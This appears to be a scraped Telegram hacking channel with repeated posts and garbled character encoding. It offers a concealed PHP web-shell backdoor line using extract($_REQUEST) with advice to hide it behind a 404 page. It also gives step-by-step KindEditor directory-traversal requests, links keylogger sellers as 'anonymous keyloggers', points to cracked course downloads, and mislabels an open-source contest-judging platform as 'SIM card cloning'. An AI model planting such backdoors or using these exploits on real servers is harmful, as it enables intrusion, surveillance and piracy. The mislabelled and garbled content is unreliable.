β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW UPDATE ALL IN ONE REAL HACKING
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Z4nzu/hackingtool.git
2) chmod -R 755 hackingtool
3) cd hackingtool
4) sudo pip3 install -r requirement.txt
5) bash install.sh
6) sudo hackingtool
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW UPDATE ALL IN ONE REAL HACKING
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Z4nzu/hackingtool.git
2) chmod -R 755 hackingtool
3) cd hackingtool
4) sudo pip3 install -r requirement.txt
5) bash install.sh
6) sudo hackingtool
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Z4nzu/hackingtool: ALL IN ONE Hacking Tool For Hackers
ALL IN ONE Hacking Tool For Hackers. Contribute to Z4nzu/hackingtool development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.
codecode show as below:
1) extract
(PHP 4, PHP 5)
extract β import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.
2) Specific application:
1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)
3) Server code:
<?@extract($_REQUEST);@die($err($info));?>
4) Finally, add various codes, tags and 404...you know (β΅β½β²)Ο
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.
codecode show as below:
1) extract
(PHP 4, PHP 5)
extract β import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.
2) Specific application:
1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)
3) Server code:
<?@extract($_REQUEST);@die($err($info));?>
4) Finally, add various codes, tags and 404...you know (β΅β½β²)Ο
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse
Let's see the truth #Cyberattack #Analyse
Forwarded from UNDERCODE NEWS
Free photo site Freepik reports data leak involving 8.3 million users
#Leaks
#Leaks
Forwarded from UNDERCODE COMMUNITY
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)
https://mac.keylogger.org/
https://android.keylogger.org/
https://www.keyloggers.com/
https://netbull-keylogger.keyloggers.com/10/buy1click.html
http://staffcop-standard.keyloggers.com/review.html
http://spytector.keyloggers.com/review.html
https://all-in-one-keylogger.keyloggers.com/10/buy1click.html
https://refog-personal-monitor.keyloggers.com/11/buy1click.html
https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html
https://staffcop-standard.keyloggers.com/review.html
https://netbull-keylogger.keyloggers.com/review.html
https://refog-personal-monitor.keyloggers.com/review.html
https://total-logger.keyloggers.com/review.html
https://spytech-spyagent-standard-edition.keyloggers.com/review.html
@uNDERCODEtESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANONYMOUS KEYLOGGERS(PAID/TRIALS/FREE)
https://mac.keylogger.org/
https://android.keylogger.org/
https://www.keyloggers.com/
https://netbull-keylogger.keyloggers.com/10/buy1click.html
http://staffcop-standard.keyloggers.com/review.html
http://spytector.keyloggers.com/review.html
https://all-in-one-keylogger.keyloggers.com/10/buy1click.html
https://refog-personal-monitor.keyloggers.com/11/buy1click.html
https://spyrix-personal-monitor-pro.keyloggers.com/12/buy1click.html
https://staffcop-standard.keyloggers.com/review.html
https://netbull-keylogger.keyloggers.com/review.html
https://refog-personal-monitor.keyloggers.com/review.html
https://total-logger.keyloggers.com/review.html
https://spytech-spyagent-standard-edition.keyloggers.com/review.html
@uNDERCODEtESTING
β β β Uππ»βΊπ«Δπ¬πβ β β β
Keylogger.Org
Best keystroke loggers for macOS. Mac OS X keyloggers comparison.
A detailed comparison table of the best keyloggers for macOS for 2018. Mac OS X keystroke loggers have been compared and reviewed by our team of experts, so now you can easily choose, download or purchase the best OS X monitoring software for employee surveillanceβ¦
Forwarded from UNDERCODE COMMUNITY
101+ OSINT Resources for Investigators [2020].pdf
848.5 KB
101 OSINT RESOURCES
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - varqox/sim: Sim is an open source platform for carrying out algorithmic contests and programming classes.
Sim is an open source platform for carrying out algorithmic contests and programming classes. - varqox/sim
stored xxs in facebook.pdf
441.5 KB
The Open Graph protocol When you add a URL in a Facebook post, Facebook will use the Open Graph protocol (FB doc) to display rich content. Here is a summary about how Facebook uses OG to embed external content in a FB post:
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
Break webcam-cctv like expert .pdf
2.4 MB
Now it could be that your CCTV, IP camera is simply exposed on the Internet and the attacker has found it on sites such as Shodan. You havenβt changed the default password and bam, they are in. Watching your every move.
Forwarded from Backup Legal Mega
π¦The Complete 2020 Web Development Bootcamp rating 5
https://mega.nz/folder/b8gx0C6K#zs_6OEDfK33BnnvhGEE6iw
https://mega.nz/folder/b8gx0C6K#zs_6OEDfK33BnnvhGEE6iw
mega.nz
18.52 GB folder on MEGA
681 files and 34 subfolders
Forwarded from WEB UNDERCODE - PRIVATE
π¦ Chase Reiner - SEO Nexus Bundle - Procrackteam-14.58gb-
https://mega.nz/folder/ax4TkTyJ#gN774-7eWlrH4Watsm2pmA
https://mega.nz/folder/ax4TkTyJ#gN774-7eWlrH4Watsm2pmA
mega.nz
14.58 GB folder on MEGA
66 files and 5 subfolders
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem
KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.
> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem
KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.
> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β